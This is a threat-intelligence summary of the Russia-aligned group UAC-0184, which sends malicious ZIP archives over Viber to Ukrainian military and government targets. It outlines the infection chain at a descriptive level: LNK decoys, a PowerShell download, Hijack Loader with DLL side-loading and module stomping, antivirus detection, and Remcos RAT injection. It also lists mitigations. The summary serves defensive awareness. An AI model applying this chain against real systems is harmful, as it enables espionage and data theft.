Full Report
The Russia-aligned threat actor known as UAC-0184 has been observed targeting Ukrainian military and government entities by leveraging the Viber messaging platform to deliver malicious ZIP archives. "This organization has continued to conduct high-intensity intelligence gathering activities against Ukrainian military and government departments in 2025," the 360 Threat Intelligence Center said in
Analysis Summary
# Threat Actor: UAC-0184
## Attribution & Identity
* **Identification:** UAC-0184 (Tracked also as Hive0156).
* **Attribution:** Russia-aligned threat actor.
* **First Documented:** Early January 2024 by CERT-UA.
## Activity Summary
UAC-0184 has continued high-intensity intelligence gathering activities against Ukrainian military and government departments throughout 2025. The group has evolved its TTPs, moving from war-themed phishing emails to leveraging widely used messaging platforms for initial access.
## Tactics, Techniques & Procedures
* **Initial Access/Delivery:** Leveraging the **Viber messaging platform** to deliver malicious ZIP archives.
* **Deception:** ZIP archives contain multiple Windows shortcut (***.LNK***) files disguised as official Microsoft Word and Excel documents to serve as decoy and lower suspicion.
* **Execution Chain:** LNK files silently execute a PowerShell script to fetch a second ZIP archive (`smoothieks.zip`) from a remote server.
* **Malware Staging:** Reconstructs and deploys **Hijack Loader** in memory using multi-stage processes, including DLL side-loading and module stomping for defense evasion.
* **Defense Evasion:** Scans the environment for security software (e.g., Kaspersky, Avast, BitDefender, AVG, Emsisoft, Webroot, Microsoft) by calculating their CRC32 hashes.
* **Persistence:** Establishing persistence via **scheduled tasks**.
* **Final Payload Delivery:** Covertly executes **Remcos RAT** by injecting it into the process `chime.exe`.
## Targeting
* **Sectors:** Military and Government entities.
* **Geography:** Ukraine.
* **Victims:** Ukrainian military and government departments.
## Tools & Infrastructure
* **Malware Families Used:**
* **Hijack Loader:** Used as the primary infection mechanism/loader.
* **Remcos RAT:** Deployed as the final stage for remote control, monitoring, and data theft.
* **Infrastructure (C2):**
* Remote server hosting the second-stage ZIP archive (`smoothieks.zip`). (No specific URLs/IPs provided in extract)
## Implications
UAC-0184 demonstrates continuous adaptation, shifting delivery mechanisms to popular communication apps (Viber, following past use of Signal and Telegram) to maintain high-intensity intelligence gathering against sensitive Ukrainian targets. The reliance on sophisticated in-memory execution (DLL side-loading, module stomping) and common RATs like Remcos indicates a persistent and capable espionage operation.
## Mitigations
* Implement strict endpoint security monitoring focused on behavioral anomalies, especially concerning PowerShell execution originating from communications applications.
* Harden systems against LNK file execution and ensure LNK files cannot execute scripts or fetch remote content.
* Implement robust process injection detection, particularly monitoring unexpected code execution within legitimate system processes (`chime.exe`).
* Review firewall and network policies to restrict command-and-control traffic associated with known malware families or unusual download patterns following messaging app interactions.